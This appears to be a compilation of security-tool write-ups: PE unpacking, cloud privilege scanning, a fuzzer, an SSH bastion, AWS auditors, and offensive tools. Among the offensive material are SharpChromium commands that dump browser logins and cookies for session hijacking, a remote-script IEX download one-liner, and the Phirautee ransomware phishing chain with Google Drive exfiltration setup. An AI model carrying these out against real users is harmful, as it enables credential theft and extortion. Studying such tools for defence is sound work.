  1. Launch IDA Pro and disassemble an MPRESS or UPX packed PE file (select Manual Load and Load Resources)
  2. Select debugger (Windows or Bochs) and run until OEP (usually 0x00401000)
  3. At this point you could take a memory snapshot (saving all segments) and save the IDB for later
  4. Ensure IDA has found all code Options -> General -> Analysis -> Reanalyze program
  5. Open PE Tree, right-click and choose Add PE -> Search IDB
  6. Right click on HEADER-0x00400000 (or appropriate module) and select Dump...
  7. Specify the AddressOfEntryPoint (typically 0x1000)
  8. Ensure Rebuild imports is selected
  9. Dump!
A new executable will be created using the unpacked section data obtained from memory/IDB, and a new section named .idata containing the rebuilt IAT, hint name table and IDT will be appended to the PE file. If the entry-point memory segment has been marked writable during execution (via VirtualProtect for example) then the EP section characteristics will also be marked writable. Finally, the BASERELOC, BOUND_IMPORT and SECURITY data directories are marked null, and the OPTIONAL_HEADER checksum is recalculated (if enabled via config)
Using the above approach it is possible to dump many in-memory PE files that have either been unpacked, remotely injected, reflectively loaded or hollowed etc.

Configuration

Overview
The configuration is stored in an INI file and defaults to the following values:
[config]
debug = False
fonts = Consolas,Monospace,Courier
virustotal_url = https://www.virustotal.com/gui/search
cyberchef_url = https://gchq.github.io/CyberChef

[dump]
enable = True
recalculate_pe_checksum = False

Options
Section   Option                    Type      Description
config    debug                     boolean   Print pefile.dump() to output
config    fonts                     string    Comma-separated list of font names for UI
config    virustotal_url            string    VirusTotal search URL
config    cyberchef_url             string    CyberChef URL
dump      enable                    boolean   Enable process dumping/IAT rebuilding in IDA
dump      recalculate_pe_checksum   boolean   Recalculate PE header checksum (slow!)

Location
Type          OS          Path
Application   Windows     %TEMP%\pe_tree.ini
Application   Linux/Mac   /tmp/pe_tree.ini
IDAPython     Windows     %APPDATA%\HexRays\IDA Pro\pe_tree.ini
IDAPython     Linux/Mac   ~/.idapro/pe_tree.ini

3rd party data sharing
The following information will be shared with 3rd party web-applications (depending on configuration) under the following conditions:

VirusTotal
If the VirusTotal URL is specified in the configuration then metadata such as file hashes, timestamps, etc will be sent to VirusTotal for processing when the user clicks on highlighted links or selects "VirusTotal search" from the right-click context menu.

CyberChef
If the CyberChef URL is present in the configuration then any file data will be base64 encoded and sent to CyberChef for processing when the user selects "CyberChef" from the right-click context menu.
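For illustration, that handoff amounts to building a CyberChef URL with the selected bytes base64-encoded in the URL fragment. A rough sketch of the idea (not PE Tree's actual code; the exact encoding CyberChef expects may differ slightly):
import base64

cyberchef_url = "https://gchq.github.io/CyberChef"

def cyberchef_link(data: bytes) -> str:
    # CyberChef can read input passed as base64 in the #input= fragment of its URL.
    encoded = base64.b64encode(data).decode()
    return f"{cyberchef_url}/#input={encoded}"

print(cyberchef_link(b"MZ\x90\x00"))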

Troubleshooting

AttributeError: module 'pip' has no attribute 'main'
or

PyQt5 fails to install under Linux
Try to upgrade pip to version 20.0+:
$ pip install --upgrade pip

ModuleNotFoundError: No module named 'PyQt5.sip'
Try uninstalling and reinstalling PyQt5 as follows:
pip uninstall PyQt5
pip uninstall PyQt5-sip
pip install PyQt5 PyQt5-sip

Missing imports after dumping
Ensure IDA has found and disassembled all code:
Options -> General -> Analysis -> Reanalyze program
After this is completed try to dump/rebuild imports again.

Contributing
Please feel free to contribute! Issues and pull requests are most welcome.

Developer documentation
To build documentation from source using Sphinx:
$ pip install sphinx
$ sphinx-apidoc -o ./doc/source/ .
$ sphinx-build -b html ./doc/source ./doc/build -E
To view the documentation open ./doc/build/index.html in a web-browser.



SkyArk - Helps To Discover, Assess And Secure The Most Privileged Entities In Azure And AWS


SkyArk is a cloud security project with two main scanning modules:
  1. AzureStealth - Scans Azure environments
  2. AWStealth - Scans AWS environments

These two scanning modules will discover the most privileged entities in the target AWS and Azure.

The Main Goal - Discover The Most Privileged Cloud Users
SkyArk currently focuses on mitigating the new threat of Cloud Shadow Admins, and helps organizations to discover, assess and protect cloud privileged entities.
Stealthy and undercover cloud admins may reside in every public cloud platform, and SkyArk helps mitigate this risk in AWS and Azure.
In defensive/pentest/risk assessment procedures - make sure to address the threat and validate that those privileged entities are indeed well secured.

Background:
SkyArk deals with the rising threat of Cloud Shadow Admins - how attackers can find and abuse non-trivial, so-called “limited” permissions to escalate their privileges and become full cloud admins.
Furthermore, attackers can easily use those tricky, specific permissions to hide stealthy admin entities that will wait for them as an undercover persistence technique.
SkyArk was initially published as part of our research on the threat of AWS Shadow Admins, this research was presented at RSA USA 2018 conference.
The AWS Shadow Admins blog post:
https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/
The recording of the RSA talk:
https://www.rsaconference.com/videos/sneak-your-way-to-cloud-persistenceshadow-admins-are-here-to-stay
About a year later, we added the AzureStealth scan to SkyArk for mitigating the Shadow Admins threat in Azure!

Tool Description
SkyArk currently contains two main scanning modules AWStealth and AzureStealth.
With the scanning results - organizations can discover the entities (users, groups and roles) who have the most sensitive and risky permissions.
In addition, we also encourage organizations to scan their environments from time to time and search for suspicious deviations in their privileged entities list.
Potential attackers are hunting for those users, and defensive teams should make sure these privileged users are well secured: they have strong, rotated and safely stored credentials, have MFA enabled, are monitored carefully, etc.
Remember that we cannot protect the things we aren't aware of, and SkyArk helps in the complex mission of discovering the most privileged cloud entities - including the straightforward admins and also the stealthy shadow admins who could easily escalate their privileges and become full admins as well.

1. AzureStealth Scan
Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins.
How To Run AzureStealth
The full details are in the AzureStealth's Readme file:
https://github.com/cyberark/SkyArk/blob/master/AzureStealth/README.md
In short:
  1. Download/sync locally the SkyArk project
  2. Open PowerShell in the SkyArk folder with the permission to run scripts:
    "powershell -ExecutionPolicy Bypass -NoProfile"
  3. Run the following commands:
(1) Import-Module .\SkyArk.ps1 -force
(2) Start-AzureStealth
AzureStealth needs only Read-Only permissions over the scanned Azure Directory (Tenant) and Subscription.
*You can also run the scan easily from within the Azure Portal by using the built-in CloudShell:
   (1) IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1')  
(2) Scan-AzureAdmins

AzureStealth DEMO:


2. AWStealth Scan
Discover the most privileged entities in the scanned AWS environment - including the AWS Shadow Admins.
How To Run AWStealth
The full details are in the AWStealth's Readme file:
https://github.com/cyberark/SkyArk/tree/master/AWStealth
In short:
  1. Download/sync locally the SkyArk project
  2. Open PowerShell in the SkyArk folder with the permission to run scripts:
    "powershell -ExecutionPolicy Bypass -NoProfile"
  3. Run the following commands:
(1) Import-Module .\SkyArk.ps1 -force
(2) Start-AWStealth
AWStealth needs only Read-Only permissions over the IAM service of the scanned AWS environment.

AWStealth DEMO:


3. SkyArk includes more small sub-modules for playing around in the cloud security field
An example of such a sub-module is the AWStrace module.
AWStrace analyzes AWS CloudTrail logs and can provide valuable new insights from them.
It especially prioritizes risky, sensitive IAM actions that potential attackers might use as part of their malicious actions as AWS Shadow Admins.
The module analyzes the log files and produces an informative CSV result file with important details on each executed action in the tested environment.
Security teams can use the results files to investigate sensitive actions, discover the entities that took those actions and reveal additional valuable details on each executed and logged action.

Quick Start
Take a look at the Readme files of the scanning modules:
AzureStealth - https://github.com/cyberark/SkyArk/blob/master/AzureStealth/README.md
AWStealth - https://github.com/cyberark/SkyArk/blob/master/AWStealth/README.md

Share Your Thoughts And Feedback
Asaf Hecht (@Hechtov) and CyberArk Labs
More coverage of the rising Cloud Shadow Admins threat:
ThreatPost: https://threatpost.com/cloud-credentials-new-attack-surface-for-old-problem/131304/
TechTarget\SearchCloudSecurity: https://searchcloudsecurity.techtarget.com/news/252439753/CyberArk-warns-of-shadow-admins-in-cloud-environments
SecurityBoulevard: https://securityboulevard.com/2018/05/cyberark-shows-how-shadow-admins-can-be-created-in-cloud-environments/
LastWatchDog: https://www.lastwatchdog.com/cyberark-shows-how-shadow-admins-can-be-created-in-cloud-environments/
Byron Acohido's Podcast: https://soundcloud.com/byron-acohido/cloud-privileged-accounts-flaws-exposed


SharpChromium - .NET 4.0 CLR Project To Retrieve Chromium Data, Such As Cookies, History And Saved Logins


SharpChromium is a .NET 4.0+ CLR project to retrieve data from Google Chrome, Microsoft Edge, and Microsoft Edge Beta. Currently, it can extract:
  • Cookies (in JSON format)
  • History (with associated cookies for each history item)
  • Saved Logins
Note: All cookies returned are in JSON format. If you have the Cookie Editor extension installed, you can simply copy and paste into the "Import" section of this browser add-on to ride the extracted session.

Advantages
This rewrite has several advantages over previous implementations, including:
  • No Type compilation or reflection required
  • Cookies are displayed in JSON format, for easy importing into Cookie Editor.
  • No downloading SQLite assemblies from remote resources.
  • Supports major Chromium browsers (but extendable to others)

Usage
Usage:
.\SharpChromium.exe arg0 [arg1 arg2 ...]

Arguments:
all - Retrieve all Chromium Cookies, History and Logins.
full - The same as 'all'
logins - Retrieve all saved credentials that have non-empty passwords.
history - Retrieve user's history with a count of each time the URL was
visited, along with cookies matching those items.
cookies [domain1.com domain2.com] - Retrieve the user's cookies in JSON format.
If domains are passed, then return only
cookies matching those domains. Otherwise,
all cookies are saved into a temp file of
the format ""%TEMP%\$browser-cookies.json""

Examples
Retrieve cookies associated with Google Docs and Github
.\SharpChromium.exe cookies docs.google.com github.com


Retrieve history items and their associated cookies.
.\SharpChromium.exe history


Retrieve saved logins (Note: Only displays those with non-empty passwords):
.\SharpChromium.exe logins


Notes on the SQLite Parser
The SQLite database parser is slightly bugged. This is due to the fact that the parser correctly detects data blobs as type System.Byte[], but it does not correctly detect columns of type System.Byte[]. As a result, the byte arrays get cast to the string literal "System.Byte[]", which is wrong. I haven't gotten to the root of this cause, but as a quick and dirty workaround I have encoded all blob values as Base64 strings. Thus if you wish to retrieve a value from a column whose regular data values would be a byte array, you'll need to Base64 decode them first.
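So, when consuming the output, blob columns need one extra decode step. A minimal sketch in Python (the value below is an example; replace it with a Base64 blob taken from the tool's output):
import base64

# Decode a blob column that SharpChromium emitted as a Base64 string.
encoded_blob = "dGVzdA=="  # example value; replace with a Base64 blob from SharpChromium's output
raw_bytes = base64.b64decode(encoded_blob)
print(raw_bytes)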

Special Thanks
A large thanks to @plainprogrammer for their C#-SQLite project which allowed for native parsing of the SQLite files without having to reflectively load a DLL. Without their work this project would be nowhere near as clean as it is. That project can be found here: https://github.com/plainprogrammer/csharp-sqlite
Thanks to @gentilkiwi whose work on Mimikatz guided the rewrite of the decryption schema in v80+
Thanks to @harmj0y who carved out the requisite PInvoke BCrypt code so I could remove additional dependencies from this project, making it light-weight again.


Nautilus - A Grammar Based Feedback Fuzzer


Nautilus is a coverage-guided, grammar-based fuzzer. You can use it to improve your test coverage and find more bugs. By specifying the grammar of semi-valid inputs, Nautilus is able to perform complex mutations and to uncover more interesting test cases. Many of the ideas behind this fuzzer are documented in a paper published at NDSS 2019.


Version 2.0 has added many improvements to this early prototype and is now 100% compatible with AFL++. Besides general usability improvements, Version 2.0 includes lots of shiny new features:
  • Support for AFL-Qemu mode
  • Support for grammars specified in python
  • Support for non-context free grammars using python scripts to generate inputs from the structure
  • Support for specifying binary protocols/formats
  • Support for specifying regex based terminals that aren't part of the directed mutations
  • Better ability to avoid generating the same very short inputs over and over
  • Massive cleanup of the code base
  • Helpful error output on invalid grammars
  • Fixed a bug in the timeout code that occasionally deadlocked the fuzzer

How Does Nautilus Work?
You specify a grammar using rules such as EXPR -> EXPR + EXPR or EXPR -> NUM and NUM -> 1. From these rules, the fuzzer constructs a tree. This internal representation allows applying much more complex mutations than working on raw bytes. The tree is then turned into a real input for the target application. In normal context-free grammars this process is straightforward: all leaves are concatenated. The left tree in the example below would unparse to the input a=1+2 and the right one to a=1+1+1+2. To increase the expressiveness of your grammars, Nautilus lets you provide python functions for the unparsing process, allowing much more complex specifications.
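For reference, the EXPR example above can be written directly in Nautilus's python grammar format. A minimal sketch (it uses the same ctx.rule API as the XML grammar shown further below; the START rule is an assumption made to reproduce the a=1+2 style inputs):
# Minimal grammar for the EXPR example above.
ctx.rule("START", "a={EXPR}")
ctx.rule("EXPR", "{EXPR}+{EXPR}")
ctx.rule("EXPR", "{NUM}")
ctx.rule("NUM", "1")
ctx.rule("NUM", "2")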


Setup
# checkout the git
git clone 'git@github.com:nautilus-fuzz/nautilus.git'
cd nautilus
/path/to/AFLplusplus/afl-clang-fast test.c -o test #afl-clang-fast as provided by AFL

# all arguments can also be set using the config.ron file
cargo run --release -- -g grammars/grammar_py_example.py -o /tmp/workdir -- ./test @@

# or if you want to use QEMU mode:
cargo run /path/to/AFLplusplus/afl-qemu-trace -- ./test_bin @@

Examples
Here, we use python to generate a grammar for valid xml-like inputs. Notice the use of a script rule to ensure the opening and closing tags match.
#ctx.rule(NONTERM: string, RHS: string|bytes) adds a rule NONTERM->RHS. We can use {NONTERM} in the RHS to request a recursion. 
ctx.rule("START","<document>{XML_CONTENT}</document>")
ctx.rule("XML_CONTENT","{XML}{XML_CONTENT}")
ctx.rule("XML_CONTENT","")

#ctx.script(NONTERM: string, RHS: [string], func) adds a rule NONTERM->func(*RHS).
# In contrast to normal `rule`, RHS is an array of nonterminals.
# It's up to the function to combine the values returned for the NONTERMINALS with any fixed content used.
ctx.script("XML",["TAG","ATTR","XML_CONTENT"], lambda tag,attr,body: b"<%s %s>%s</%s>"%(tag,attr,body,tag) )
ctx.rule("ATTR","foo=bar")
ctx.rule("TAG","some_tag")
ctx.rule("TAG","other_tag")

#sometimes we don't want to explore the set of possible inputs in more detail. For example, if we fuzz a script
#interpreter, we don't want to spend time on fuzzing all different variable names. In such cases we can use Regex
#terminals. Regex terminals are only mutated during generation, but not during normal mutation stages, saving a lot of time.
#The fuzzer still explores different values for the regex, but it won't be able to learn interesting values incrementally.
#Use this when incremental exploration would most likely waste time.

ctx.regex("TAG","[a-z]+")
To test your grammars you can use the generator:
$ cargo run --bin generator -- -g grammars/grammar_py_example.py -t 100 
<document><some_tag foo=bar><other_tag foo=bar><other_tag foo=bar><some_tag foo=bar></some_tag></other_tag><some_tag foo=bar><other_tag foo=bar></other_tag></some_tag><other_tag foo=bar></other_tag><some_tag foo=bar></some_tag></other_tag><other_tag foo=bar></other_tag><some_tag foo=bar></some_tag></some_tag></document>
You can also use Nautilus in combination with AFL. Simply point AFL's -o to the same workdir, and AFL will synchronize with Nautilus. Note that this is one-way: AFL imports Nautilus inputs, but not the other way around.
#Terminal/Screen 1
./afl-fuzz -Safl -i /tmp/seeds -o /tmp/workdir/ ./test @@

#Terminal/Screen 2
cargo run --release -- -o /tmp/workdir -- ./test @@

Trophies


Bastillion - A Web-Based SSH Console That Centrally Manages Administrative Access To Systems


Bastillion is a web-based SSH console that centrally manages administrative access to systems. Web-based administration is combined with management and distribution of users' public SSH keys. Key management and administration is based on profiles assigned to defined users.
Administrators can log in using two-factor authentication with Authy or Google Authenticator. From there they can manage their public SSH keys or connect to their systems through a web shell. Commands can be shared across shells to make patching easier and eliminate redundant command execution.
Bastillion layers TLS/SSL on top of SSH and acts as a bastion host for administration. Protocols are stacked (TLS/SSL + SSH) so infrastructure cannot be exposed through tunneling / port forwarding. More details can be found in the following whitepaper: Implementing a Trusted Third-Party System for Secure Shell. Also, SSH key management is enabled by default to prevent unmanaged public keys and enforce best practices.

Bastillion Releases
Bastillion is available for free use under the Affero General Public License
https://github.com/bastillion-io/Bastillion/releases
or purchase from the AWS marketplace
https://aws.amazon.com/marketplace/pp/Loophole-LLC-Bastillion/B076PNFPCL
Also, Bastillion can be installed on FreeBSD via the FreeBSD ports system. To install via the binary package, simply run:
pkg install security/bastillion

Prerequisites
Open-JDK / Oracle-JDK - 1.9 or greater
apt-get install openjdk-9-jdk
http://www.oracle.com/technetwork/java/javase/downloads/index.html
Install Authy or Google Authenticator to enable two-factor authentication with Android or iOS
ApplicationAndroidiOS
AuthyGoogle PlayiTunes
Google AuthenticatorGoogle PlayiTunes

To Run Bundled with Jetty
Download bastillion-jetty-vXX.XX.tar.gz
https://github.com/bastillion-io/Bastillion/releases
Export environment variables
for Linux/Unix/OSX
 export JAVA_HOME=/path/to/jdk
export PATH=$JAVA_HOME/bin:$PATH
for Windows
 set JAVA_HOME=C:\path\to\jdk
set PATH=%JAVA_HOME%\bin;%PATH%
Start Bastillion
for Linux/Unix/OSX
    ./startBastillion.sh
for Windows
    startBastillion.bat
More Documentation at: https://www.bastillion.io/docs/index.html

Build from Source
Install Maven 3 or greater
apt-get install maven
http://maven.apache.org
Install Loophole MVC
https://github.com/bastillion-io/lmvc
Export environment variables
export JAVA_HOME=/path/to/jdk
export M2_HOME=/path/to/maven
export PATH=$JAVA_HOME/bin:$M2_HOME/bin:$PATH
In the directory that contains the pom.xml run
mvn package jetty:run
Note: Doing a mvn clean will delete the H2 DB and wipe out all the data.

Using Bastillion
Open browser to https://<whatever ip>:8443
Login with
username:admin
password:changeme
Note: When using the AMI instance, the password is defaulted to the <Instance ID>. Also, the AMI uses port 443 as in https://<Instance IP>:443

Managing SSH Keys
By default Bastillion will overwrite all values in the specified authorized_keys file for a system. You can disable key management by editing BastillionConfig.properties file and use Bastillion only as a bastion host. This file is located in the jetty/bastillion/WEB-INF/classes directory. (or the src/main/resources directory if building from source)
#set to false to disable key management. If false, the Bastillion public key will be appended to the authorized_keys file (instead of it being overwritten completely).
keyManagementEnabled=false
Also, the authorized_keys file is updated/refreshed periodically based on the relationships defined in the application. If key management is enabled the refresh interval can be specified in the BastillionConfig.properties file.
#authorized_keys refresh interval in minutes (no refresh for <=0)
authKeysRefreshInterval=120
By default Bastillion will generate and distribute the SSH keys managed by administrators, while having them download the generated private key. This forces admins to use strong passphrases for keys that are set on systems. The private key is only available for download once and is not stored on the application side. To disable this and allow administrators to set any public key, edit BastillionConfig.properties.
#set to true to generate keys when added/managed by users and enforce strong passphrases set to false to allow users to set their own public key
forceUserKeyGeneration=false

Supplying a Custom SSH Key Pair
Bastillion generates its own public/private SSH key upon initial startup for use when registering systems. You can specify a custom SSH key pair in the BastillionConfig.properties file.
For example:
#set to true to regenerate and import SSH keys  --set to true
resetApplicationSSHKey=true

#SSH Key Type 'dsa' or 'rsa'
sshKeyType=rsa

#private key --set pvt key
privateKey=/Users/kavanagh/.ssh/id_rsa

#public key --set pub key
publicKey=/Users/kavanagh/.ssh/id_rsa.pub

#default passphrase --leave blank if passphrase is empty
defaultSSHPassphrase=myPa$$w0rd
After startup and once the key has been registered it can then be removed from the system. The passphrase and the key paths will be removed from the configuration file.

Adjusting Database Settings
Database settings can be adjusted in the configuration properties.
#Database user
dbUser=bastillion
#Database password
dbPassword=p@$$w0rd!!
#Database JDBC driver
dbDriver=org.h2.Driver
#Connection URL to the DB
dbConnectionURL=jdbc:h2:keydb/bastillion;CIPHER=AES;
By default the datastore is set as embedded, but a remote H2 database can be used by adjusting the connection URL.
#Connection URL to the DB
dbConnectionURL=jdbc:h2:tcp://<host>:<port>/~/bastillion;CIPHER=AES;

External Authentication
External Authentication can be enabled through the BastillionConfig.properties.
For example:
#specify an external authentication module (ex: ldap-ol, ldap-ad).  Edit the jaas.conf to set connection details
jaasModule=ldap-ol
Connection details need to be set in the jaas.conf file
ldap-ol {
com.sun.security.auth.module.LdapLoginModule SUFFICIENT
userProvider="ldap://hostname:389/ou=example,dc=bastillion,dc=com"
userFilter="(&(uid={USERNAME})(objectClass=inetOrgPerson))"
authzIdentity="{cn}"
useSSL=false
debug=false;
};
Administrators will be added as they are authenticated and profiles of systems may be assigned by full-privileged users.
User LDAP roles can be mapped to profiles defined in Bastillion through the use of the org.eclipse.jetty.jaas.spi.LdapLoginModule.
ldap-ol-with-roles {
//openldap auth with roles that can map to profiles
org.eclipse.jetty.jaas.spi.LdapLoginModule required
debug="false"
useLdaps="false"
contextFactory="com.sun.jndi.ldap.LdapCtxFactory"
hostname="<SERVER>"
port="389"
bindDn="<BIND-DN>"
bindPassword="<BIND-DN PASSWORD>"
authenticationMethod="simple"
forceBindingLogin="true"
userBaseDn="ou=users,dc=bastillion,dc=com"
userRdnAttribute="uid"
userIdAttribute="uid"
userPasswordAttribute="userPassword"
userObjectClass="inetOrgPerson"
roleBaseDn="ou=groups,dc=bastillion,dc=com"
roleNameAttribute="cn"
roleMemberAttribute="member"
roleObjectClass="groupOfNames";
};
Users will be added/removed from defined profiles as they login and when the role name matches the profile name.

Auditing
Auditing is disabled by default. Audit logs can be enabled through the log4j2.xml by uncommenting the io.bastillion.manage.util.SystemAudit and the audit-appender definitions.
https://github.com/bastillion-io/Bastillion/blob/master/src/main/resources/log4j2.xml#L19-L22
Auditing through the application is only a proof of concept. It can be enabled in the BastillionConfig.properties.
#enable audit  --set to true to enable
enableInternalAudit=true

Screenshots








Acknowledgments
Special thanks goes to these amazing projects which makes this (and other great projects) possible.
Third-party dependencies are mentioned in the 3rdPartyLicenses.md

Author
Loophole, LLC - Sean Kavanagh


AWS Report - A Tool For Analyzing Amazon Resources


AWS Report is a tool for analyzing Amazon (AWS) resources.

Install using PIP
pip install awsreport

Features
  • Search IAM users based on creation date
  • Search public S3 buckets
  • Search security groups by inbound rule (default 0.0.0.0/0)
  • Search unassociated Elastic IPs
  • Search available (unattached) EBS volumes
  • Search publicly shared AMIs
  • Search detached internet gateways

Options
aws_report.py [OPTIONS]

Options:
--s3 Search buckets public in s3
--iam Search iam users based on creation date
--iam-max-age Use max-age to search for users created more than X days ago
--sg Search security groups with inbound specific rule
--elasticip Search elastic IP not associated
--volumes Search volumes available
--ami Search AMIs with permission public
--owner Defines the owner of the resources to be found
--igw Search internet gateways detached
--help Show this message and exit.

Examples:
python awsreport.py --s3
python awsreport.py --iam --owner 296192063842
python awsreport.py --iam --iam-max-age 60
python awsreport.py --sg --cidr 192.168.1.0/24
python awsreport.py --sg (cidr defaults to 0.0.0.0/0)
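As a rough illustration of how one of the checks listed above could be implemented, the sketch below uses boto3 to list unassociated Elastic IPs. It is a minimal example of the underlying API call, not AWS Report's actual code, and the region value is an assumption.

# Hypothetical sketch: finding unassociated Elastic IPs with boto3.
# Not AWS Report's actual implementation, only an illustration of the API call.
import boto3

def find_unassociated_eips(region="us-east-1"):  # assumed region
    ec2 = boto3.client("ec2", region_name=region)
    addresses = ec2.describe_addresses()["Addresses"]
    # An Elastic IP without an AssociationId is allocated but not attached to anything.
    return [a["PublicIp"] for a in addresses if "AssociationId" not in a]

if __name__ == "__main__":
    for ip in find_unassociated_eips():
        print(f"[!] Unassociated Elastic IP: {ip}")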

Developer contact
[+] Twitter: @bsd0x1
[+] Telegram: @bsd0x
[+] Github: /bsd0x


DAGOBAH - Open Source Tool To Generate Internal Threat Intelligence, Inventory & Compliance Data From AWS Resources


Dagobah is an open source tool written in Python to automate internal threat intelligence generation, inventory collection and compliance checks across different AWS resources. Dagobah collects the information and saves the state into an Elasticsearch index.
Dagobah runs as an AWS Lambda function and looks at all AWS regions, currently collecting different configurations from:
  • EC2
  • VPC
  • ENI
  • SecurityGroups

DAGOBAH GOALS:
  • Add IOCs and store them into Elasticsearch/S3.
  • Provide live, centralized inventory/config information related to AWS/non-AWS resources.
  • Automatically evaluate resources against other platforms/analyzers.

AWS services/resources:
  • VPC
  • EC2
  • ENI
  • Security Groups

Non-AWS resources:
  • WAZUH (coming soon)

Code layout:
./
|- dagobah.py (main control for manual/automated exec)
|- modules/
|- collector.py (query collection objects)
|- iam_aws.py (iam stuff for aws multi account-role)
|- setup.py (elk setup)
|- analizer.py (analyzer that adds external info to the collector)

How it works:


Ideally a CloudWatch event triggers the Lambda every XXX with the account, role and inventory type (all) to collect. The Lambda reads the CloudWatch event and iterates over the accounts/roles/inventory types, querying the AWS EC2 API with boto3 (no extra charges for use). For some resources an additional analyzer is triggered to gather context information such as (see the sketch after this list):
  • Wazuh information (coming soon)
  • EC2 running time
  • security group rule status (open/closed)
Each result is stored in the inventory index of Elasticsearch.
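A minimal sketch of the collection pattern described above follows: a Lambda handler that queries EC2 with boto3 and indexes the results into Elasticsearch. The handler name, event fields, index name and ES_HOST value are assumptions for illustration, not Dagobah's actual code.

# Hypothetical sketch of the Lambda collection pattern described above; not Dagobah's code.
# Assumes an Elasticsearch cluster reachable at ES_HOST and the 'elasticsearch' Python client (8.x style).
import boto3
from elasticsearch import Elasticsearch

ES_HOST = "http://localhost:9200"  # assumption: replace with your cluster endpoint

def handler(event, context):
    region = event.get("region", "us-east-1")  # assumed event field
    es = Elasticsearch(ES_HOST)
    ec2 = boto3.client("ec2", region_name=region)

    # Collect basic EC2 instance configuration for the inventory index.
    for reservation in ec2.describe_instances()["Reservations"]:
        for instance in reservation["Instances"]:
            doc = {
                "type": "ec2",
                "region": region,
                "instance_id": instance["InstanceId"],
                "state": instance["State"]["Name"],
                "security_groups": [g["GroupId"] for g in instance.get("SecurityGroups", [])],
            }
            es.index(index="inventory", document=doc)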

Future integrations:
  • lambda functions
  • aws elb/nlb
  • dns route53
  • iam / trustadvisor
  • s3 buckets
  • eks/fargate
  • transit-gateways
  • api gateway


Unfollow-Plus - Automated Instagram Unfollower Bot


Automated Instagram Unfollower Bot.

Installation :
  • apt update
  • apt install git curl -y
  • git clone git://github.com/htr-tech/unfollow-plus.git
  • cd unfollow-plus

> Run : bash unfollower.sh

Single Command :
apt update ; apt install git curl -y ; git clone git://github.com/htr-tech/unfollow-plus.git ; cd unfollow-plus ; bash unfollower.sh

Credits :

Code is taken from InsHackle by The Linux Choice (https://github.com/thelinuxchoice)

Features :

[+] Hidden Password Added !
[+] 100 % secure !
[+] Easy for Beginners !



Phirautee - A PoC Crypto Virus To Spread User Awareness About Attacks And Implications Of Ransomwares


A proof of concept crypto virus to spread user awareness about attacks and the implications of ransomware. Phirautee is written purely in PowerShell and does not require any third-party libraries. The tool steals information, holds an organisation's data hostage for payment, or permanently encrypts/deletes the organisation's data.
Phirautee is a Living off the Land (LotL) ransomware, which means it uses legitimate PowerShell commands and operations to work against the operating system.

Screenshots
  • Ransom pop-up window:

  • Desktop background upon successful infection:

DEF CON Presentation
https://speakerdeck.com/viralmaniar/phirautee-defcon28-writing-ransomware-using-living-off-the-land-lotl-tactics


Legal Disclaimer
This project must not be used for illegal purposes or for hacking into systems where you do not have permission; it is strictly for educational purposes and for people to experiment with.

  • Performing any hack attempts or tests without written permission from the owner of the computer system is illegal.
  • If you recently suffered a breach or were targeted by ransomware and find the techniques or tools illustrated in this presentation similar, this neither incriminates me in any way nor implies any connection between myself and the attackers.
  • The tools and techniques remain universal, and penetration testers and security consultants often use them during engagements.
  • Phirautee project must not be used for illegal purposes. It is strictly for educational and research purposes and for people to experiment with.

DEF CON 28 Safe Mode
Over the past few years, ransomware has gone wild and organisations around the world are being targeted, leading to damage and disruption. As we all know, the threat landscape is changing rapidly and we hear the fuss about ransomware infections at the office or read about them in the news. Have you ever wondered how threat actors write ransomware? What level of sophistication and understanding is required to target an organisation? In this demo, we will utilise native Windows commands to build ransomware and target a host via phishing. Introducing Phirautee, a proof of concept crypto virus to spread user awareness about attacks and the implications of ransomware. Phirautee is written purely in PowerShell and does not require any third-party libraries. The tool steals information, holds an organisation's data hostage for payment, or permanently encrypts/deletes the organisation's data. The tool uses public-key cryptography to encrypt the data on the disk. Before encrypting, it exfiltrates the files from the network to the attacker. Once the files are encrypted and exfiltrated, the original files are permanently deleted from the host and the tool then demands a ransom. The ransom is demanded in cryptocurrency, so transactions are more difficult for law enforcement to trace. During the demonstration of Phirautee, you will see a complete attack chain, i.e. from receiving the ransomware attack via a phishing email to how the files get encrypted on the compromised systems. A detailed walkthrough of the source code will be provided to show how attackers utilise simple methods to create something dangerous. I will end the demo with several defence mechanisms by performing forensic analysis on Phirautee using publicly available tools.

Phirautee Introduction
  • Phirautee is a proof of concept ransomware tool written purely using PowerShell.
  • It uses Living off the Land (LotL) commands to work against the operating system to encrypt files on the machine.
  • This tool can be used during internal infrastructure penetration testing or during the red team exercise to validate Blue Team/SOC response to ransom attacks.
  • It uses public key cryptography to encrypt user content and exfiltrates large files via Google Drive.
  • Upon a successful attack the ransomware asks for a payment of 0.10 BTC (~1k USD).
  • Detection:
    • The file extension of encrypted files is changed to “.phirautee”
    • The desktop wallpaper of the compromised host is changed to the Phirautee background
    • The desktop will have a Phirautee.txt file

Phirautee Attack Setup
  • Phishing server and domain to target an organisation.
  • Email server to send malicious documents as an attachment to the targeted user.
  • A macro-embedded file sent as an attachment to the user, which pulls the ransomware from the remote server onto the targeted machine and runs it in memory.
  • Modify a couple of parameters in the ransomware file to adapt it to your use case.
  • For data exfiltration:
    • Throwaway Gmail account
    • Gmail API access to a throwaway Google Drive
    • Setup web application on the Google

Steps for setting up Data Exfiltration using Google Drive
Google offers a REST API that can be accessed via PowerShell to perform operations on the files such as upload, download and delete. The REST API allows you to leverage Google Drive storage from within your app.


Please follow the steps below to perform exfiltration via the Phirautee ransomware.
Step 1: Visit https://console.cloud.google.com/cloud-resource-manager
Step 2: Click on "CREATE PROJECT"


Step 3: Once the project is created, enable the Google Drive API by clicking on "ENABLE APIS AND SERVICES".


Step 4: Locate the Google Drive related APIs in the API Library:


Step 5: Once located, enable the API. This allows access to various operations via Google Drive.


Step 6: After enabling API access, click on the "create credentials" button.


Step 7: Now create OAuth Client ID Credentials


Step 8: Select Web Application as product type and configure the authorized redirect URI to https://developers.google.com/oauthplayground


Step 9: Save your client ID and secret. If you don't, they can always be accessed from Credentials in APIs & Services. Now browse to https://developers.google.com/oauthplayground
Step 10: Click on the gear icon and tick on the "Use your own OAuth credentials"


Step 11: Authorize the https://www.googleapis.com/auth/drive API and then click “Exchange authorization code for tokens”. This should give you a 200 OK response. Make sure you save your refresh token. We will need this in Phirautee to upload large files to the throwaway Google account.
